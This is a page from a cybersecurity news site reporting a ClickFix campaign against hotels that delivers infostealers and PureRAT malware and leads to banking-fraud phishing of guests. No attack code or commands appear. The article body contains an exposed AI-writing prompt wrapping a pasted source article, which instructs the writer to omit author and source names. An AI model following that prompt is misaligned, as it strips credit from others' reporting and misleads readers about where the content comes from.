Close Menu
  • Home
  • Cybercrime and Ransomware
  • Emerging Tech
  • Threat Intelligence
  • Expert Insights
  • Careers and Learning
  • Compliance

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

What's Hot

Scattered Spider Member Extradited to U.S.

July 2, 2026

South Korea Denies Discrimination Allegations Against Coupang

July 2, 2026

Critical Vulnerability Lets Hackers Read Arbitrary Files on Cisco Catalyst Center

July 2, 2026
Facebook X (Twitter) Instagram
The CISO Brief
  • Home
  • Cybercrime and Ransomware
  • Emerging Tech
  • Threat Intelligence
  • Expert Insights
  • Careers and Learning
  • Compliance
Home » ClickFix Scam Strikes Hotels, Ignites Customer Backlash

ClickFix Scam Strikes Hotels, Ignites Customer Backlash

Staff WriterBy Staff WriterNovember 10, 2025No Comments6 Mins Read8 Views
Facebook Twitter Pinterest LinkedIn Tumblr Email
Share
Facebook Twitter LinkedIn Pinterest WhatsApp Email

Summary Points

  1. Targeted Cyber Attacks: Researchers discovered a widespread campaign aimed at hotels, utilizing ClickFix attacks to infiltrate systems and steal customer data as part of broader assaults on the hospitality sector.

  2. Phishing Tactics: Attackers exploited compromised Booking.com accounts to send phishing emails and messages, leveraging stolen customer data for legitimacy, ultimately leading to customer impersonation and credential theft.

  3. Malware Deployment: The campaign disseminated infostealing malware and a remote access Trojan (RAT) named PureRAT, which facilitated extensive access to compromised systems and allowed for further malicious activity.

  4. Secondary Victims: Following initial attacks, threat actors initiated downstream attacks targeting hotel customers through fraudulent communications, prompting them to verify banking details on phishing sites mimicking Booking.com.

[gptAs a technology journalist, write a short news story divided in two subheadings, at 12th grade reading level about ‘ClickFix Scam Targets Hotels, Spurs Customer Attacks’in short sentences using transition words, in an informative and explanatory tone, from the perspective of an insightful Tech News Editor, ensure clarity, consistency, and accessibility. Use concise, factual language and avoid jargon that may confuse readers. Maintain a neutral yet engaging tone to provide balanced perspectives on practicality, possible widespread adoption, and contribution to the human journey. Avoid passive voice. The article should provide relatable insights based on the following information ‘

Researchers have uncovered a broad campaign in which threat actors target hotels with ClickFix attacks to steal customer data as part of ongoing attacks against the hospitality sector that includes secondary attacks against the establishments’ customers.

Threat analysts at Sekoia.io uncovered the activity when a partner alerted them to a phishing campaign that used either emails sent from a hotel’s compromised Booking.com account or messages in WhatsApp, according to a report published Friday. Attackers had customer data, including personal identifiers and reservation details, which made their phishing attempts appear more legitimate.

After further analysis, the researchers realized the activity was part of a much broader campaign that started around April and was still active up to at least October involving a ClickFix attack spreading infostealing malware that targeted hotels and other lodging establishments, they said. The campaign enabled the theft of professional credentials granting access to booking platforms, such as Booking.com and Expedia.

“Threat actors then either sold the harvested credentials on cybercrime forums or leveraged them directly to send fraudulent emails to hotel customers, often as part of banking fraud schemes,” Jeremy Scion, Quentin Bourgue, and Sekoia Threat Detection Response (TDR) wrote in the report. Moreover, they uncovered “hundreds of malicious domains active for several months as of October 2025, demonstrating a resilient and likely profitable campaign,” according to the report.

Related:SonicWall Firewall Backups Stolen by Nation-State Actor

Targeting Hospitality Sector

The initial attack against hotels uses a compromised email account to send malicious messages to multiple hotel establishments. In some instances, attackers alter the “From” header to impersonate Booking.com, while subject lines are often related to guest matters, including references to last-minute booking, listings, reservations, and the like.

The attack chain then using a redirection URL that ultimately leads to a ClickFix reCAPTACHA challenge in which users are prompted to copy a malicious PowerShell command. This command eventually leads to the deployment of infostealing and remote access Trojan (RAT) malware.

Sequoia.io cited March research from Microsoft that detailed attackers impersonating Booking.com in ClickFix attacks against hotels, noting that the campaigns are similar.

Cofense last June also detailed a ClickFix campaign targeting hotels that used lures regarding guests similar to the one Sekoia.io outlined. Cofense’s report noted the attacks delivered various infostealing and RAT malware as well, demonstrating consistent attack activity against the hospitality sector using ClickFix.

Related:Nikkei Suffers Breach Via Slack Compromise

ClickFix Multi-Malware Delivery

ClickFix is an attack method first detailed by researchers at Proofpoint last year in which a compromised website shows users fake error messages by executing malicious code, tricking them into thinking they have to download or update software to address the issue. In reality, however, installing the “update” actually executes malware on their devices. Since its discovery, the vector has gained steady traction with threat actors.

In this campaign, the attack delivers infostealing malware that gathers various data from the compromised system, including key system information, and downloads files that lead to the launch of a RAT known as “PureRAT” for further malicious activity. The infostealer also reports status updates to its command-and-control (C2) infrastructure at each step of the attack to indicate the successful progression of the action, the researchers noted.

PureRAT is a modular malware-as-a-service (Maas) also known as PureHVNC and ResolverRAT. Once deployed, PureRAT capabilities include remote user interface access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries, according to the Sekoia.io report.

Related:Iran’s Elusive “SmudgedSerpent’ APT Phishes Influential US Policy Wonks

Downstream Customer Attacks

The ClickFix attacks against hotels have led to secondary attacks against their customers, with attackers contacting them via WhatsApp or email using legitimate reservation details of the target, according to the researchers. 

“The message claimed an alleged security issue had occurred during the verification of the customer’s banking details and urged them to confirm their information,” they wrote. “To strengthen the credibility of the message, the attacker explained that this was a procedure implemented by Booking to protect against cancellations.”

Attackers then ask victims to validate banking details by visiting a URL, which led to the phishing page that mimics Booking.com’s typography and layout and which harvests the victim’s banking information. 

Avoiding ClickFix Scams

The campaign is further evidence of the growing effectiveness of threat actors in various aspects of malicious activities, including social engineering in their targeting of Booking.com and hospitality sites, as well as use of related lures and commodity malware on cybercrime forums.

To help defenders avoid compromise, Sekoia.io included a list of indicators of compromise (IoCs) in the post related, including those associated with the Clickfix redirect URL, PowerShell URL, and payload; PureRAT staging and payload; and URLs involved in the phishing campaign against hotel customers.

As always, people should be suspicious of receiving unsolicited emails related to services they frequently use, and analyze them carefully even if they appear to come from a credible sender or service provider.

‘. Do not end the article by saying In Conclusion or In Summary. Do not include names or provide a placeholder of authors or source. Make Sure the subheadings are in between html tags of

[/gpt3]

Stay Ahead with the Latest Tech Trends

Dive deeper into the world of Cryptocurrency and its impact on global finance.

Stay inspired by the vast knowledge available on Wikipedia.

CyberRisk-V1

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleEmerging Threats Unveiled in New Enterprise Browser Security Report
Next Article CISA’s Expiration Creates a Critical Gap in US Cyber Collaboration
Avatar photo
Staff Writer
  • Website

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Comments are closed.

Latest Posts

Scattered Spider Member Extradited to U.S.

July 2, 2026

Critical Vulnerability Lets Hackers Read Arbitrary Files on Cisco Catalyst Center

July 2, 2026

JADEPUFFER Ransomware Uses Base64 Python Payloads to Steal Cloud & API Keys

July 2, 2026

Browser-Only Ransomware Hacks Chrome API to Encrypt Android Photos

July 2, 2026
Don't Miss

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Recent Posts

  • Scattered Spider Member Extradited to U.S.
  • South Korea Denies Discrimination Allegations Against Coupang
  • Critical Vulnerability Lets Hackers Read Arbitrary Files on Cisco Catalyst Center
  • JADEPUFFER Ransomware Uses Base64 Python Payloads to Steal Cloud & API Keys
  • ToddyCat-linked malware exploits OAuth to access Gmail accounts
About Us
About Us

Welcome to The CISO Brief, your trusted source for the latest news, expert insights, and developments in the cybersecurity world.

In today’s rapidly evolving digital landscape, staying informed about cyber threats, innovations, and industry trends is critical for professionals and organizations alike. At The CISO Brief, we are committed to providing timely, accurate, and insightful content that helps security leaders navigate the complexities of cybersecurity.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Scattered Spider Member Extradited to U.S.

July 2, 2026

South Korea Denies Discrimination Allegations Against Coupang

July 2, 2026

Critical Vulnerability Lets Hackers Read Arbitrary Files on Cisco Catalyst Center

July 2, 2026
Most Popular

Protecting MCP Security: Defeating Prompt Injection & Tool Poisoning

January 30, 202633 Views

Unlock the Power of Free WormGPT: Harnessing DeepSeek, Gemini, and Kimi-K2 AI Models

November 27, 202530 Views

The New Face of DDoS is Impacted by AI

August 4, 202528 Views

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025

Categories

  • Compliance
  • Cyber Updates
  • Cybercrime and Ransomware
  • Editor's pick
  • Emerging Tech
  • Events
  • Featured
  • Insights
  • Most Read
  • Threat Intelligence
  • Uncategorized
© 2026 thecisobrief. Designed by thecisobrief.
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions

Type above and press Enter to search. Press Esc to cancel.